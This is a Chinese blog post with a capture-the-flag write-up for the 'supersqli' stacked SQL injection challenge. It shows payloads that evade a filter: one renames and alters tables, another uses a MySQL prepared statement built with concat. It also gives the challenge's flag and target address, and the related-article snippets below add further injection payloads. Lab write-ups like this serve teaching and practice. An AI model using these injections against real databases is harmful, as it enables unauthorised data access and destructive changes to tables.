supersqli--堆叠注入

最新推荐文章于 2024-02-29 15:34:27 发布
最新推荐文章于 2024-02-29 15:34:27 发布
阅读量351 收藏
点赞数 8
分类专栏: sql注入 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyaowangchuan/article/details/108998980
版权

supersqli–堆叠注入【强网杯2019】

在这里插入图片描述
查看源代码
在这里插入图片描述

有提到sqlmap
用sqlmap扫一扫试一试
只爆出supersqli
回到题目发现有过滤关键字

在这里插入图片描述

order by 判断只有两个字段

把绕过的方法挨个试了一遍,发现可以堆叠注入,查出两个表名,但是不能select,关键字过滤了

也可以是1’;show tables;#
在这里插入图片描述

把两个表里的列爆出
先来第一个表1919810931114514
http://111.198.29.45:39533/?inject=2’;show columns from 1919810931114514;–+
(字符串为表名进行操作时要加反引号)
在这里插入图片描述

在一串数字的表里见到了flag列,flag可能在里面。

http://111.198.29.45:39533/?inject=2’;show columns from words;–+
查询words表
在这里插入图片描述

百度了一下
在words表里发现结构id与查询的出的数据类型相同,一个数字,一个字符串,可以看出默认查询的就是words表,inject值应该赋给了id。
思路:
页面默认查的是words表,将1919810931114514的表名和words交换
发现并没有过滤rename和alter等,所以我们可改变表的结构。
构造语句
1’;RENAME TABLE words TO words1;RENAME TABLE 1919810931114514 TO words;ALTER TABLE words CHANGE flag id VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;#

先把words表名改为其他名,再吧1919810931114514表名改为words,但是其中还缺少id列,因此可以添加一个id列或者吧flag改为id,这样这个表就成为了默认查询表

CHARACTER SET utf8:数据库字符集。设置数据库的默认编码为utf8
COLLATE utf8_general_ci:数据库校对规则。ci是case insensitive的缩写,意思是大小写不敏感;相对的是cs,即case sensitive,大小写敏感;还有一种是utf8_bin,是将字符串中的每一个字符用二进制数据存储,区分大小写。

1’ or ‘1’='1
查询flag
在这里插入图片描述

flag{c168d583ed0d4d7196967b28cbd0b5e9}

https://blog.csdn.net/cherish_2012/article/details/38347507 rename函数
https://blog.csdn.net/qq_38967578/article/details/80875939 SQL alter操作

还发现一种方法就是用mysql预处理
1’;use supersqli;set @sql=concat(‘s’,'elect * from 1919810931114514');PREPARE pre FROM @sql;EXECUTE pre;–+
用concat连接绕过了关键字的检查
在这里插入图片描述

flag{c168d583ed0d4d7196967b28cbd0b5e9}
得到flag

https://blog.csdn.net/qq_42030417/article/details/80372800 理解Mysql prepare预处理语句

wuyaoooo
关注
  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询框里过滤了,在url框里没有) 在使用union select时发现过滤关键字 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200313161718411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpd
SQL注入堆叠注入
m0_48907714的博客
04-03 3062
SQL注入堆叠注入 堆叠注入:就是一堆sql语句(多条)进行执行。在mysql中,每句语句结尾加;表示语句结束,这样我们就想到了是不是可以多句一起使用,也就是堆叠。(并非支持全部数据库)(一般就是mysql) 先在数据库运行,一次性进行两句sql语句 靶场:sqli-labs/Less-38/ 后台sql语句 sql="SELECT∗FROMusersWHEREid=′sql="SELECT * FROM users WHERE id='sql="SELECT∗FROMusersWHEREid=′id
15-SQL堆叠注入
qq_56414082的博客
03-29 1750
参考资料;sqlmap中存放绕过waf的一些脚本小插件在tamper文件夹中创建rdog.py,在tamper中找个文件打开,复制脚本修改""""""import repass(*/)')(*/)')//--proxy是代理,和bg抓包IP一致可以看到的是代码并没有按照我们预期执行,我们添加代理看看到底是个什么情况可以看到user-agent是,安全软件当中是禁止使用这种脚本客户端所以就被拦截,自然插件脚本也就没办法正常执行解决思路:通过抓包对比分析。
SQL注入进阶——堆叠注入
最新发布
m0_69151365的博客
02-29 1346
我们最开始先进行常规注入,发现有报错,就考虑联合查询和报错注入,再发现select,update等都被waf过滤掉了,到这之后我们也没啥思路了, 我们去看了源码发现有multi_query()这个函数,我们就考虑了堆叠注入,完了之后就先查表数据,我们查到flag数据位919810931114514这个表中,我没想到的就是预编译,但是select、prepare、set、等都被waf过滤,源码可以发现预编译的关键词都可以使用大写来绕过,select绕不过去,于是我们就使用concat函数将进行拼接。
日常收集常用SQL查询语句大全
09-10
SQL,全称Structured Query Language,是用于管理关系数据库的标准语言。本文主要介绍了一些日常工作中常见的SQL查询语句,包括简单查询和复杂查询,对于数据库管理、数据分析和开发人员来说非常实用。...
Mysql注入 -- 堆叠注入
weixin_41489908的博客
05-25 1260
你上学时没读过的书、没上过的课、没跑过的步,总有一天会让你全部还回来。。。 ---- 网易云热评 一、堆叠注入介绍 1、多条sql语句同时执行 2、union只能执行查询语句,堆叠可以执行增删改查 3、同时执行三条语句 select 1;select 2;select 3; 二、插入注入 1、找到注入点,添加一条数据 http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,passwor..
SQL Injection8(堆叠注入)——强网杯2019随便注
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠注入)——强网杯2019随便注 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便注是一道sql注入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠注入的知识,堆叠注入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠注入原理 在SQL中,...
supersqli(SQL注入流程及常用SQL语句)
Welcome To Myon'Blog !
03-30 870
一、SQL注入知识学习 1、判断注入类型 (1)数字型注入判断 (2)字符型注入判断 2、猜解sql查询语句中的字段数(order by 的使用) 3、判断显示位爆数据库的名字 4、注释(--+的使用) 5、堆叠注入 6、handler语句及用法 二、基于上述知识对此题的分析与解答 1、注入点、注入类型 2、判断列数 3、利用or 1=1暴露表中数据 联合注入 (1)看数据库 (2)查表名 (3)查询表中的列 6、处理被过滤 7、handler、hackba的使用
攻防世界XCTF:supersqli
末初的CSDN博客
03-13 2365
加个单引号发现报错 比较烦的就是过滤了select 这样就无法进行查数据了,而且这里的/i就是忽略了大小写。无法进行大小写过滤 首先可以通过报错函数,把数据库给注入出来 -1' and extractvalue(1,concat(1,version()))-- + 版本信息:.18-MariaDB 数据库名称:supersqli 然后经过测试发现这里可以执行多条语句,也就是堆叠注入...
07_SQL注入_堆叠注入&绕过注入
qq_42171569的博客
06-03 1339
谈及堆叠,顾名思义:就是多条语句一同执行。实际开发中,部分数据库支持多条SQL语句同时执行,在这样的场景下进行SQL注入,我们是否能够在payload中构造多条可执行语句呢?当然可以。SQL语句中“;”代表了一条语句的结束,在写入payload时只需要用“;”分割多条语句,在限制不到位的情况下就可以自定义执行多条语句,案例如下:假设数据库中存在表users 如果恶意用户将参数人为构造成:垓参数与SQL语句进行拼接,就会变为:一旦恶意代码被执行,users表就会被删除通过上述案例,不难发现,对比与联合查询un
攻防世界之supersqli
金 帛的博客
03-08 7794
攻防世界WP
【攻防世界】十四、supersqli
Hi~ 土拨鼠
09-08 150
步骤 先输入1'")提交之后发现报错: 根据报错信息我们可以发现是用单引号'来进行闭合的 接着使用1' --+发现被过滤: 然后使用注释1' #发现可以使用: 使用order by语句发现有两个字段,接下来再用联合查询1' and select 1,2 #发现被过滤了: 而且绕不过去,既然这样我们尝试一下报错注入: payload:1' and extractvalue(1,concat('^',database(),'^'))# 成功拿到库名,但是拿到之后也没有其他方法继续拿数据,这里我们...
攻防世界web进阶区之supersqli
qq_45756971的博客
07-16 424
打开题目所给链接:首先我们先探测其有无注入: 1’ 报错 1’# 正常且为True 1’ and 1=1# 正常且为True 1’ and 1=2# 正常且为False 所以它里边存在注入。 用1’ or extractvalue(rand(),concat(0x7e,database())) #爆出数据库名: 用0’; use supersqli; show tables;爆出表明:用0’; use supersqli; show columns from 1919810931114514; #
渗透测试-SQL注入堆叠注入-攻防世界supersqli实战
保持微笑的博客
01-19 1946
1.堆叠注入原理 平常我们注入时都是通过对原来sql语句传输数据的地方进行相关修改,注入情况会因为该语句本身的情况而受到相关限制,例如一个select语句,那么我们注入时也只能执行select操作,无法进行增、删、改,其他语句也同理,所以可以说我们能够注入的十分有限。 但堆叠注入则完全打破了这种限制,其名字顾名思义,就是可以堆一堆sql注入进行注入,这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简单,就是将原来的语句构造完后加上分号,代表该语句结束,后面在输入的就是一个全新的sql语句了,这
《WEB安全渗透测试》(5)SQL注入实战:堆叠查询注入
午夜安全
10-03 6606
《WEB安全渗透测试》(5)SQL注入实战:堆叠查询注入 堆叠查询注入堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开。而堆叠查询注入攻击就是利用此特点,在第二条语句中构造自己要执行的语句。1)考虑使用堆叠注入访问URL:http://www.tianchi.com/web/duidie.php?id=1返回正常信息;访问URL:http://www.tianchi.com/web/duidie.php?id=1'返回错误信息......
使用SQLmap进行注入流程
weixin_62715196的博客
08-10 2853
主要讲述SQLmap的主要功能以及对单个目标如何进行注入
攻防世界-supersqli(堆叠注入
m0_62094846的博客
12-23 2164
输入1正常显示,输入1‘报错,可以判定是注入 输入2可以,3不行,可以知道有2个字段 然后判定回显位 1' union select 1,2# 过滤了挺多东西的,双写select也无法绕过 看了wp,是堆叠注入 查找数据库 ?inject=1';show databases;--+ 查看表 -1';show tables;--+ 查看words表 -1';desc words;--+ 查看1919810931114514表 -1'...
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值